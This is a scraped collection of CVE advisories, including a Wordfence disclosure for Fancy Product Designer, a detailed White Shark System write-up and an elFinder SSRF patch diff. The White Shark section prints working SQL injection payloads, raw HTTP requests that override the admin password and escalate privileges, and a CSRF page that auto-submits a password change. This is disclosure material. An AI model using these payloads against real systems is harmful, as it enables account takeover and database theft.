PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\check_availability.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information.

CVE-2020-22164: GitHub - itodaro/PHPGurukul_Hospital_Management_System4.0_cve

Cross Site Request Forgery (CSRF) in JuQingCMS v1.0 allows remote attackers to gain local privileges via the component "JuQingCMS_v1.0/admin/index.php?c=administrator&a=add".

CVE-2020-18648

The Fancy Product Designer WordPress plugin before 4.6.9 allows unauthenticated attackers to upload arbitrary files, resulting in remote code execution.

_Update: A patched version of Fancy Product Designer, 4.6.9, is now available as of June 2, 2021. This article has been updated to reflect newly available information, including Indicators of Compromise._

On May 31, 2021, the Wordfence Threat Intelligence team discovered a critical file upload vulnerability being actively exploited in Fancy Product Designer, a WordPress plugin installed on over 17,000 sites.

We initiated contact with the plugin’s developer the same day and received a response within 24 hours. We sent over the full disclosure the same day we received a response, on June 1, 2021. Due to this vulnerability being actively attacked, we are publicly disclosing with minimal details until users have time to update to the patched version in order to alert the community to take precautions to keep their sites protected.

While the Wordfence Firewall’s built-in file upload protection sufficiently blocks the majority of attacks against this vulnerability, we determined that a bypass was possible in some configurations. As such, we released a new firewall rule to our premium customers on May 31, 2021. Sites still running the free version of Wordfence will receive the rule after 30 days, on June 30, 2021.

As this is a Critical 0-day under active attack and is exploitable in some configurations even if the plugin has been deactivated, we urge anyone using this plugin to update to the latest version available, 4.6.9, immediately.

**Description:** Unauthenticated Arbitrary File Upload and Remote Code Execution  
**Affected Plugin:** Fancy Product Designer  
**Plugin Slug:** fancy-product-designer  
**Affected Versions:** < 4.6.9  
**CVE ID:** CVE-2021-24370  
**CVSS Score:** 9.8 (Critical)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
**Researcher/s:** Charles Sweethill/Ram Gall  
**Fully Patched Version:** 4.6.9

Fancy Product Designer is a WordPress plugin that offers the ability for customers to upload images and PDF files to be added to products. Unfortunately, while the plugin had some checks in place to prevent malicious files from being uploaded, these checks were insufficient and could easily be bypassed, allowing attackers to upload executable PHP files to any site with the plugin installed. This effectively made it possible for any attacker to achieve Remote Code Execution on an impacted site, allowing full site takeover.

We will provide a more detailed technical explanation of the vulnerability once more users have updated to a patched version.

**How do I update?**

In most cases you will need to login to codecanyon.net. Once you are logged in, you should be able to visit the product page at https://codecanyon.net/item/fancy-product-designer-woocommercewordpress/6318393. In the Overview sidebar on the right-hand side of the product page you should see a Download link:

Once you have downloaded the patched version of the plugin, you should be able to login to your WordPress site and go to Plugins->Add New->Upload Plugin to upload the patched plugin.

**Indicators of Compromise**

In most cases a successful attack results in a number of files which will appear in a subfolder of either  
wp-admin  
or  
wp-content/plugins/fancy-product-designer/inc  
with the date the file was uploaded. For instance:

wp-content/plugins/fancy-product-designer/inc/2021/05/30/4fa00001c720b30102987d980e62d5e4.php

or

wp-admin/2021/05/31/4fa00001c720b30102987d980e62d5e4.php

_Update – the filenames in question are deterministic and we have added filenames associated with this vulnerability._  
The following filenames and MD5 hashes are associated with this attack:

ass.php – MD5 3783701c82396cc96d842839a291e813. This is the initial payload, a dropper that then retrieves additional malware from a 3rd party site.  
op.php – MD5 29da9e97d5efe5c9a8680c7066bb2840. A password-protected Webshell.  
prosettings.php – MD5 e6b9197ecdc61125a4e502a5af7cecae. A Webshell found in older infections.  
4fa00001c720b30102987d980e62d5e4.php – MD5 4329689c76ccddd1d2f4ee7fef3dab71. This payload decodes and loads a separate Webshell.  
4fa00001c720b30002987d983e62d5e1.jpg – MD5 c8757b55fc7d456a7a1a1aa024398471. The compressed webshell loaded by 4fa00001c720b30102987d980e62d5e4.php. Cannot be executed without the loader script.

The majority of attacks against this vulnerability are coming from the following IP addresses:

69.12.71.82  
92.53.124.123  
46.53.253.152

This attacker appears to be targeting e-commerce sites and attempting to extract order information from site databases. As this order information contains personally identifiable information from customers, site owners are in a particularly difficult position if they are still running vulnerable versions of this plugin as it risks the e-commerce merchant’s PCI-DSS compliance.

Our research indicates that this vulnerability is likely not being attacked on a large scale but has been exploited since at least May 16, 2021. _Update: Our Threat Intelligence Team has now found evidence of this vulnerability being exploited as early as January 30, 2021._

**Timeline**

**May 31, 2021** 15:05 UTC – Wordfence Security Analyst Charles Sweethill finds evidence of a previously unknown vulnerability during malware removal and forensic investigation as part of a site cleaning and begins investigating possible attack vectors.  
**May 31, 2021** 15:45 UTC – Charles notifies the Wordfence Threat Intelligence team and a full investigation begins.  
**May 31, 2021** 16:20 UTC – We develop an initial proof of concept and begin work on a firewall rule.  
**May 31, 2021** 17:06 UTC – We initiate contact with the plugin developer.  
**May 31, 2021** 18:59 UTC – We release the firewall rule protecting against this vulnerability to Wordfence Premium customers.  
**June 1, 2021** 09:03 UTC – The plugin developer responds to our initial contact.  
**June 1, 2021** 13:35 UTC – We send over full disclosure.  
**June 2, 2021** – The plugin developer releases a patched version, 4.6.9, of the plugin.  
**June 30, 2021** – Firewall rule becomes available to free Wordfence users.

**Conclusion**

In today’s article, we covered a critical 0-day vulnerability in Fancy Product Designer that is being actively attacked and used to upload malware onto sites that have the plugin installed.

While Wordfence Premium users should be protected against this vulnerability, we urge any users of this plugin to update to the latest version of the plugin, 4.6.9, immediately, as it is possible in some configurations to exploit the vulnerability even if the plugin is deactivated.

We will continue to monitor the situation and follow up as more information becomes available.

_Special Thanks to Wordfence Security Analyst Charles Sweethill for discovering the vulnerability, determining the most likely vectors and indicators of compromise, and testing the firewall rule during a holiday. We also wanted to extend kudos the the plugin developer, radykal for quickly developing a patch for this issue._

CVE-2021-24370: Critical 0-day in Fancy Product Designer Under Active Attack

White Shark System (WSS) 1.3.2 is vulnerable to sensitive information disclosure via default_task_add.php, remote attackers can exploit the vulnerability to create a task.

###White Shark System(wss) Multiple Vulnerability

####General description：

White Shark System(wss) is a browser-based collaborative office platform that integrates "project management", "task management", "work management" and "work log management".

**\[1\]White Shark System(wss) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the control\_task.php, control\_project.php, default\_user.php files failing to filter the sort parameter, remote attackers can exploit the vulnerability to obtain database sensitive information.**

**\[2\]White Shark System(wss) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the default\_task\_edituser.php files failing to filter the csa\_to\_user parameter, remote attackers can exploit the vulnerability to obtain database sensitive information.**

**\[3\]White Shark System(wss) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the log\_edit.php files failing to filter the csa\_to\_user parameter, remote attackers can exploit the vulnerability to obtain database sensitive information.**

**\[4\]White Shark System(wss) 1.3.2 has an unauthorized access vulnerability,remote attackers can modify the password of any user.**

**\[5\]White Shark System(wss) 1.3.2 has a cross-site request forgery vulnerability,remote attackers can use the user\_edit\_password.php file to modify the user password.**

**\[6\]White Shark System(wss) 1.3.2 has an unauthorized access vulnerability,remote attackers can exploit this vulnerability to escalate to admin privileges.**

**\[7\]White Shark System(wss) 1.3.2 has a sensitive information disclosure vulnerability,remote attackers can obtain username information for all users of the current site.**

**\[8\]White Shark System(wss) 1.3.2 has a sensitive information disclosure vulnerability,remote attackers can exploit the vulnerability to create a task.**

**\[9\]White Shark System(wss) 1.3.2 has web site physical path leakage vulnerability.**

\*\*Environment: \*\* apache/php 7.0.12/White Shark System(wss) 1.3.2

**\[1\]SQL Injection Vulnerability**

The vulnerable file is control\_task.php. (control\_project.php, default\_user.php)

In the control\_task.php file:

On line 150, if the user submits the sort parameter, it is assigned to $sortlist.

On line 284, the GetSQLValueString function is called to process $sortlist and assign it to $query_Recordset1.

 In the GetSQLValueString function of function.class.php, when theType is defined, it will return the value without processing.

Go back to the control\_task.php file:  Line 289 data directly enters the database query,the injection vulnerability was caused by not filtering the data.

Request the following url:/index.php?sort=1,extractvalue(rand(),concat(0x3a,substring(user(),1,30)))%23 

The current user is obtained by injection as root@localhost.

**\[2\]SQL Injection Vulnerability**

The vulnerable file is default\_task\_edituser.php.

The system can filter requests by default only after calling the GetSQLValueString function.

In the default\_task\_edituser.php file:

Line 5 restricts the user to one of "Guest" / "Ordinary User" / "Project Manager" / "Administrator".

Line 20 directly puts $_POST['csa_to_user'] into the database for query, resulting in injection.

Initiate a POST request to submit the following data:

    POST /default_task_edituser.php HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 79
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_user_edit.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=19
    
    csa_to_user=1' and 1=(updatexml(1,concat(0x5e24,(select @@version),0x5e24),1))#
    

The current database version obtained by injection is 5.5.53:

**\[3\]SQL Injection Vulnerability**

The vulnerable file is log\_edit.php.

In log\_edit.php:

Line 5 restricts the user to one of "Guest" / "Ordinary User" / "Project Manager" / "Administrator".

On line 58, $logdate enters the database query without being processed by the GetSQLValueString function, resulting in injection.

Request the following url: /log_edit.php?date=1234/**/and/**/1=(updatexml(1,concat(0x5e24,(select%20@@version),0x5e24),1))--%20-&taskid= 1

The current database version obtained by injection is 5.5.53.

**\[4\]Unauthorized Access Vulnerability**

In user\_edit\_password.php:

On line 24, the password is modified for the specified user by $_POST['ID'] and the original password is not verified. So you can override the password of someone else.

After logging in, send the following data:

    POST /user_edit_password.php HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 69
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/user_edit_password.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=21
    
    tk_user_pass=a121314156&tk_user_pass2=a121314156&MM_update=form1&ID=1
    

The admin's password will be modified to a121314156.

**\[5\]CSRF Vulnerability**

Save the following as change.html:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://127.0.0.1:8002/user_edit_password.php?UID=1" method="POST">
          <input type="hidden" name="tk_user_pass" value="a1111111" />
          <input type="hidden" name="tk_user_pass2" value="a1111111" />
          <input type="hidden" name="MM_update" value="form1" />
          <input type="hidden" name="ID" value="1" />
        </form>
    	<script>document.forms[0].submit();</script>
      </body>
    </html>
    

After the admin accesses the page, the admin's password will be modified to a1111111. If you want to modify someone else's password, modify the corresponding UID parameter.

**\[6\]Unauthorized Access Vulnerability**

In default\_user\_edit.php

Line 23 If the queried user uid does not match the current id or is not an admin, the operation is quit, and the user is prohibited from viewing other user details.

However, when the user's data update is performed on line 58, the user uid of the data to be updated is directly obtained from $_POST['ID'], so that the information of others can be modified.

POST requests the following data:

    POST /default_user_edit.php?UID=2 HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 179
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_user_edit.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=19
    
    tk_display_name=changed_by_todaro&tk_user_contact=18010101010&tk_user_email=12%40qq.com&tk_user_remark=aaaaaaaaaaaaaaaaaa&tk_user_rank=3&submit=%E4%BF%9D%E5%AD%98&MM_update=form1&ID=1
    

You can modify the information of the admin user.

At the same time, you can upgrade the current user to the admin by modifying tk\_user\_rank to 5 when you modify your own information!

    POST /default_user_edit.php?UID=2 HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 183
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_user_edit.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=19
    
    tk_display_name=todaro&tk_user_contact=18010101010&tk_user_email=12%40qq.com&tk_user_remark=aaaaaaaaaaaaaaaaaa&tk_user_rank=5&submit=%E4%BF%9D%E5%AD%98&MM_update=form1&ID=2
    

**\[7\]Sensitive Information Disclosure Vulnerability**

The if\_get\_addbook.php file does not have an authentication operation.

Line 3 reads all the input via php://input; Line 4 decodes the json data; Line 7 checks the token value in json with the check\_token function.

The check\_token function is in /function.class.php:

By default, all users have a token of 0.

So the check\_token function returns the uid of the user whose token is 0, which is the uid of all users by default.

Go back to if\_get\_addbook.php:

Line 11 calls the get\_user\_select function in function.class.php.

POST requests the following data:

    POST /if_get_addbook.php HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 11
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_user_edit.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie:
    
    {"token":0}
    

Return information for all users:

**\[8\]Unauthorized Access Vulnerability**

The default\_task\_add.php file specifies the dispatcher by $_POST[‘csa_create_user’] when assigning the task, and $_POST[‘csa_create_user’] = 1 can forge the task for the admin user.

POST requests the following data:

    POST /default_task_add.php?projectID=1&UID=-1&touser=-1 HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 313
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_task_add.php?projectID=1&UID=-1&touser=-1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=1
    
    csa_text=test_admin_create_project_by_todaro&csa_remark1=hhhh&csa_tag=ccccccc&csa_type=20&csa_to_dept=0001&csa_to_user=2&csa_from_dept=0001&csa_from_user=2&csa_create_user=1&csa_last_user=2&plan_start=2018-08-27&plan_end=2018-08-28&plan_hour=&csa_priority=3&csa_temp=3&csa_remark2=2&cont=ffff&MM_insert=form1
    

Created a task for admin through exploits.

**\[9\]**

/control\_file.php

/control\_log.php

/control\_project.php

/control\_task.php

/control\_log.php

/tree.php

/control\_task.php

CVE-2020-20467: GitHub - itodaro/WhiteSharkSystem_cve

phpCMS 2008 sp4 allowas remote malicious users to execute arbitrary php commands via the pagesize parameter to yp/product.php.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-22201: phpcms2008 product.php  pagesize parameters RCE · Issue #4 · blindkey/cve_like

Jact OpenClinic 0.8.20160412 allows the attacker to read server files after login to the the admin account by an infected 'file' GET parameter in '/shared/view_source.php' which "could" lead to RCE vulnerability .

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-20444: LFI on OpenClinic Admin · Issue #8 · jact/openclinic

elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.

@@ -419,6 +419,21 @@ class elFinder \*/ protected $removeContentSaveIds = array();  
/\*\* \* LAN class allowed when uploading via URL \* \* Array keys are 'local', 'private\_a', 'private\_b', 'private\_c' and 'link' \* \* local: 127.0.0.0/8 \* private\_a: 10.0.0.0/8 \* private\_b: 172.16.0.0/12 \* private\_c: 192.168.0.0/16 \* link: 169.254.0.0/16 \* \* @var array \*/ protected $uploadAllowedLanIpClasses = array();  
/\*\* \* Flag of throw Error on exec() \* @@ -713,6 +728,10 @@ public function \_\_construct($opts) $this\->itemLockExpire = intval($opts\['itemLockExpire'\]); }  
if (!empty($opts\['uploadAllowedLanIpClasses'\])) { $this\->uploadAllowedLanIpClasses = array\_flip($opts\['uploadAllowedLanIpClasses'\]); }  
// deprecated settings $this\->netVolumesSessionKey = !empty($opts\['netVolumesSessionKey'\]) ? $opts\['netVolumesSessionKey'\] : 'elFinderNetVolumes'; self::$sessionCacheKey = !empty($opts\['sessionCacheKey'\]) ? $opts\['sessionCacheKey'\] : 'elFinderCaches'; @@ -2524,16 +2543,87 @@ protected function abort($args = array()) } $flagFile = elFinder::$connectionFlagsPath . DIRECTORY\_SEPARATOR . 'elfreq%s'; if (!empty($args\['makeFile'\])) { self::$abortCheckFile = sprintf($flagFile, $args\['makeFile'\]); self::$abortCheckFile = sprintf($flagFile, self::filenameDecontaminate($args\['makeFile'\])); touch(self::$abortCheckFile); $GLOBALS\['elFinderTempFiles'\]\[self::$abortCheckFile\] = true; return; }  
$file = !empty($args\['id'\]) ? sprintf($flagFile, $args\['id'\]) : self::$abortCheckFile; $file = !empty($args\['id'\]) ? sprintf($flagFile, self::filenameDecontaminate($args\['id'\])) : self::$abortCheckFile; $file && is\_file($file) && unlink($file); }  
/\*\* \* Validate an URL to prevent SSRF attacks. \* \* To prevent any risk of DNS rebinding, always use the IP address resolved by \* this method, as returned in the array entry \`ip\`. \* \* @param string $url \* \* @return false|array \*/ protected function validate\_address($url) { $info = parse\_url($url); $host = trim(strtolower($info\['host'\]), '.'); // do not support IPv6 address if (preg\_match('/^\\\[.\*\\\]$/', $host)) { return false; } // do not support non dot host if (strpos($host, '.') === false) { return false; } // do not support URL-encoded host if (strpos($host, '%') !== false) { return false; } // disallow including "localhost" and "localdomain" if (preg\_match('/\\b(?:localhost|localdomain)\\b/', $host)) { return false; } // check IPv4 local loopback, private network and link local $ip = gethostbyname($host); if (preg\_match('/^0x\[0-9a-f\]+|\[0-9\]+(?:\\.(?:0x\[0-9a-f\]+|\[0-9\]+)){1,3}$/', $ip, $m)) { $long = (int)sprintf('%u', ip2long($ip)); if (!$long) { return false; } $local = (int)sprintf('%u', ip2long('127.255.255.255')) >> 24; $prv1 = (int)sprintf('%u', ip2long('10.255.255.255')) >> 24; $prv2 = (int)sprintf('%u', ip2long('172.31.255.255')) >> 20; $prv3 = (int)sprintf('%u', ip2long('192.168.255.255')) >> 16; $link = (int)sprintf('%u', ip2long('169.254.255.255')) >> 16;  
if (!isset($this\->uploadAllowedLanIpClasses\['local'\]) && $long >> 24 === $local) { return false; } if (!isset($this\->uploadAllowedLanIpClasses\['private\_a'\]) && $long >> 24 === $prv1) { return false; } if (!isset($this\->uploadAllowedLanIpClasses\['private\_b'\]) && $long >> 20 === $prv2) { return false; } if (!isset($this\->uploadAllowedLanIpClasses\['private\_c'\]) && $long >> 16 === $prv3) { return false; } if (!isset($this\->uploadAllowedLanIpClasses\['link'\]) && $long >> 16 === $link) { return false; } $info\['ip'\] = long2ip($long); if (!isset($info\['port'\])) { $info\['port'\] = $info\['scheme'\] === 'https' ? 443 : 80; } if (!isset($info\['path'\])) { $info\['path'\] = '/'; } return $info; } else { return false; } }  
/\*\* \* Get remote contents \* @@ -2552,54 +2642,20 @@ protected function abort($args = array()) protected function get\_remote\_contents(&$url, $timeout = 30, $redirect\_max = 5, $ua = 'Mozilla/5.0', $fp = null) { if (preg\_match('~^(?:ht|f)tps?://\[-\_.!\\~\*\\'()a-z0-9;/?:\\@&=+\\$,%#\\\*\\\[\\\]\]+~i', $url)) { $info = parse\_url($url); $host = trim(strtolower($info\['host'\]), '.'); // do not support IPv6 address if (preg\_match('/^\\\[.\*\\\]$/', $host)) { return false; } // do not support non dot host if (strpos($host, '.') === false) { return false; } // do not support URL-encoded host if (strpos($host, '%') !== false) { $info = $this\->validate\_address($url); if ($info === false) { return false; } // disallow including "localhost" and "localdomain" if (preg\_match('/\\b(?:localhost|localdomain)\\b/', $host)) { return false; } // wildcard DNS (e.g xip.io) if (preg\_match('/0x\[0-9a-f\]+|\[0-9\]+(?:\\.(?:0x\[0-9a-f\]+|\[0-9\]+)){1,3}/', $host)) { $host = gethostbyname($host); } // check IPv4 local loopback, private network and link local if (preg\_match('/^0x\[0-9a-f\]+|\[0-9\]+(?:\\.(?:0x\[0-9a-f\]+|\[0-9\]+)){1,3}$/', $host, $m)) { $long = (int)sprintf('%u', ip2long($host)); if (!$long) { return false; } $local = (int)sprintf('%u', ip2long('127.255.255.255')) >> 24; $prv1 = (int)sprintf('%u', ip2long('10.255.255.255')) >> 24; $prv2 = (int)sprintf('%u', ip2long('172.31.255.255')) >> 20; $prv3 = (int)sprintf('%u', ip2long('192.168.255.255')) >> 16; $link = (int)sprintf('%u', ip2long('169.254.255.255')) >> 16;  
if ($long >> 24 === $local || $long >> 24 === $prv1 || $long >> 20 === $prv2 || $long >> 16 === $prv3 || $long >> 16 === $link) { return false; } } // dose not support 'user' and 'pass' for security reasons $url = $info\['scheme'\].'://'.$host.(!empty($info\['port'\])? (':'.$info\['port'\]) : '').$info\['path'\].(!empty($info\['query'\])? ('?'.$info\['query'\]) : '').(!empty($info\['fragment'\])? ('#'.$info\['fragment'\]) : ''); $url = $info\['scheme'\].'://'.$info\['host'\].(!empty($info\['port'\])? (':'.$info\['port'\]) : '').$info\['path'\].(!empty($info\['query'\])? ('?'.$info\['query'\]) : '').(!empty($info\['fragment'\])? ('#'.$info\['fragment'\]) : ''); // check by URL upload filter if ($this\->urlUploadFilter && is\_callable($this\->urlUploadFilter)) { if (!call\_user\_func\_array($this\->urlUploadFilter, array($url, $this))) { return false; } } $method = (function\_exists('curl\_exec') && !ini\_get('safe\_mode') && !ini\_get('open\_basedir')) ? 'curl\_get\_contents' : 'fsock\_get\_contents'; return $this\->$method($url, $timeout, $redirect\_max, $ua, $fp); $method = (function\_exists('curl\_exec')) ? 'curl\_get\_contents' : 'fsock\_get\_contents'; return $this\->$method($url, $timeout, $redirect\_max, $ua, $fp, $info); } return false; } @@ -2619,8 +2675,11 @@ protected function get\_remote\_contents(&$url, $timeout = 30, $redirect\_max = 5, \* @retval false error \* @author Naoki Sawada \*\*/ protected function curl\_get\_contents(&$url, $timeout, $redirect\_max, $ua, $outfp) protected function curl\_get\_contents(&$url, $timeout, $redirect\_max, $ua, $outfp, $info) { if ($redirect\_max == 0) { return false; } $ch = curl\_init(); curl\_setopt($ch, CURLOPT\_URL, $url); curl\_setopt($ch, CURLOPT\_HEADER, false); @@ -2633,11 +2692,19 @@ protected function curl\_get\_contents(&$url, $timeout, $redirect\_max, $ua, $outfp curl\_setopt($ch, CURLOPT\_LOW\_SPEED\_LIMIT, 1); curl\_setopt($ch, CURLOPT\_LOW\_SPEED\_TIME, $timeout); curl\_setopt($ch, CURLOPT\_SSL\_VERIFYPEER, false); curl\_setopt($ch, CURLOPT\_FOLLOWLOCATION, 1); curl\_setopt($ch, CURLOPT\_MAXREDIRS, $redirect\_max); curl\_setopt($ch, CURLOPT\_FOLLOWLOCATION, false); curl\_setopt($ch, CURLOPT\_USERAGENT, $ua); curl\_setopt($ch, CURLOPT\_RESOLVE, \[$info\['host'\] . ':' . $info\['port'\] . ':' . $info\['ip'\]\]); $result = curl\_exec($ch); $url = curl\_getinfo($ch, CURLINFO\_EFFECTIVE\_URL); $http\_code = curl\_getinfo($ch, CURLINFO\_HTTP\_CODE); if ($http\_code == 301 || $http\_code == 302) { $new\_url = curl\_getinfo($ch, CURLINFO\_REDIRECT\_URL); $info = $this\->validate\_address($new\_url); if ($info === false) { return false; } return $this\->curl\_get\_contents($new\_url, $timeout, $redirect\_max - 1, $ua, $outfp, $info); } curl\_close($ch); return $outfp ? $outfp : $result; } @@ -2658,7 +2725,7 @@ protected function curl\_get\_contents(&$url, $timeout, $redirect\_max, $ua, $outfp \* @throws elFinderAbortException \* @author Naoki Sawada \*/ protected function fsock\_get\_contents(&$url, $timeout, $redirect\_max, $ua, $outfp) protected function fsock\_get\_contents(&$url, $timeout, $redirect\_max, $ua, $outfp, $info) { $connect\_timeout = 3; $connect\_try = 3; @@ -2669,22 +2736,15 @@ protected function fsock\_get\_contents(&$url, $timeout, $redirect\_max, $ua, $outf $getSize = null; $headers = '';  
$arr = parse\_url($url); if (!$arr) { // Bad request return false; } $arr = $info; if ($arr\['scheme'\] === 'https') { $ssl = 'ssl://'; }  
// query $arr\['query'\] = isset($arr\['query'\]) ? '?' . $arr\['query'\] : ''; // port $port = isset($arr\['port'\]) ? $arr\['port'\] : ''; $arr\['port'\] = $port ? $port : ($ssl ? 443 : 80);  
$url\_base = $arr\['scheme'\] . '://' . $arr\['host'\] . ($port ? (':' . $port) : ''); $url\_base = $arr\['scheme'\] . '://' . $info\['host'\] . ':' . $info\['port'\]; $url\_path = isset($arr\['path'\]) ? $arr\['path'\] : '/'; $uri = $url\_path . $arr\['query'\];  
@@ -2765,7 +2825,11 @@ protected function fsock\_get\_contents(&$url, $timeout, $redirect\_max, $ua, $outf sleep(1); } fclose($fp); return $this\->fsock\_get\_contents($url, $timeout, $redirect\_max, $ua, $outfp); $info = $this\->validate\_address($url); if ($info === false) { return false; } return $this\->fsock\_get\_contents($url, $timeout, $redirect\_max, $ua, $outfp, $info); } break; case 200: @@ -3831,7 +3895,8 @@ protected function archive($args) $targets = isset($args\['targets'\]) && is\_array($args\['targets'\]) ? $args\['targets'\] : array(); $name = isset($args\['name'\]) ? $args\['name'\] : '';  
if (($volume = $this\->volume($targets\[0\])) == false) { $targets = array\_filter($targets, array($this, 'volume')); if (!$targets || ($volume = $this\->volume($targets\[0\])) === false) { return $this\->error(self::ERROR\_ARCHIVE, self::ERROR\_TRGDIR\_NOT\_FOUND); }  
@@ -4339,7 +4404,7 @@ protected function itemLocked($hash) if (!elFinder::$commonTempPath) { return false; } $lock = elFinder::$commonTempPath . DIRECTORY\_SEPARATOR . $hash . '.lock'; $lock = elFinder::$commonTempPath . DIRECTORY\_SEPARATOR . self::filenameDecontaminate($hash) . '.lock'; if (file\_exists($lock)) { if (filemtime($lock) + $this\->itemLockExpire < time()) { unlink($lock); @@ -4368,7 +4433,7 @@ protected function itemLock($hashes, $autoUnlock = true) $hashes = array($hashes); } foreach ($hashes as $hash) { $lock = elFinder::$commonTempPath . DIRECTORY\_SEPARATOR . $hash . '.lock'; $lock = elFinder::$commonTempPath . DIRECTORY\_SEPARATOR . self::filenameDecontaminate($hash) . '.lock'; if ($this\->itemLocked($hash)) { $cnt = file\_get\_contents($lock) + 1; } else { @@ -4519,6 +4584,16 @@ public static function getApiFullVersion() return (string)self::$ApiVersion . '.' . (string)self::$ApiRevision; }  
/\*\* \* Return self::$commonTempPath \* \* @return string The common temporary path. \*/ public static function getCommonTempPath() { return self::$commonTempPath; }  
/\*\* \* Return Is Animation Gif \* @@ -5104,6 +5179,24 @@ public static function expandMemoryForGD($imgInfos) } }  
/\*\* \* Decontaminate of filename \* \* @param String $name The name \* \* @return String Decontaminated filename \*/ public static function filenameDecontaminate($name) { // Directory traversal defense if (DIRECTORY\_SEPARATOR === '\\\\') { $name = str\_replace('\\\\', '/', $name); } $parts = explode('/', trim($name, '/')); $name = array\_pop($parts); return $name; }  
/\*\* \* Execute shell command \* @@ -5279,4 +5372,4 @@ class elFinderAbortException extends Exception  
class elFinderTriggerException extends Exception { } }

CVE-2021-32682: Merge pull request from GHSA-wph3-44rj-92pr · Studio-42/elFinder@a106c35

